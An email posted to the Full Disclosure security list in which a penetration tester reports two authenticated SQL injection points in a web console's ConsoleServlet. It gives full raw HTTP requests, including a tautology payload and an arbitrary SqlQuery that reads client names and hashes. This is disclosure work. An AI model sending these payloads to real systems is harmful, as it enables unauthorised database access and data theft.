Hi Brandon,
we found two injection points. One in the BinaryFileHandler class:
POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175
ActionType=BinaryFile&Action=EXISTS&GUID=0'or'1'='1
And one in the ExpRecordHandler class:
POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175;
REQUESTSIG=09E0C480920F594CBD036BD07DC9A0B13198C99E8AFD93C83A2174710122381CD74369B6A1F2A53CA3121005A65062406DCDDBDCADCE182A532F8D1C47DCC6730CA872CA488D26A8A9E0CF296B99FEC0165F757A486DC66D28012BDD15C4C0F151AFF64A8F4724161C26C2D820D3BB14C248C0E748852BE52CBEE7CC5C04E5E26B415AD471A2FD03E4151798DE7021B8
Content-Type: application/x-www-form-urlencoded
Content-Length: 329
ActionType=ExpRecord&ObjectType=SemClient&SqlQuery=SELECT+@@version+AS+CLIENT_ID,DOMAIN_ID,GROUP_ID,GROUP_IS_OU,OU_GUID,POLICY_MODE,COMPUTER_ID,HARDWARE_KEY,COMPUTER_NAME,COMPUTER_DOMAIN_NAME,DESCRIPTION,USER_NAME,FULL_NAME,USER_DOMAIN_NAME,HASH,PIN_MARK,EXTRA_FEATURE,CREATOR,CREATION_TIME,USN,TIME_STAMP,DELETED+from+SEM_CLIENT
Both require authentication. The latter does also require a request
signature REQUESTSIG, which is based on the requested parameters and a
hard-coded key.
--
Markus Wulftange
Senior Penetration Tester
Code White GmbH
Magirus-Deutz-Straße 18
89077 Ulm
E-Mail markus.wulftange@xxxxxxxxxxxxxx
PGP C6D6 C18B BAB9 0089 6942 213D 7772 8552 E9F8 6F39
http://www.code-white.com
Code White GmbH
Sitz und Registergericht/Domicile and Register Court: Stuttgart,
HRB-Nr./Commercial Register No.: 749152
Geschäftsführung/Management: Dr. Helmut Mahler, Andreas Melzner, Lüder
Sachse
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/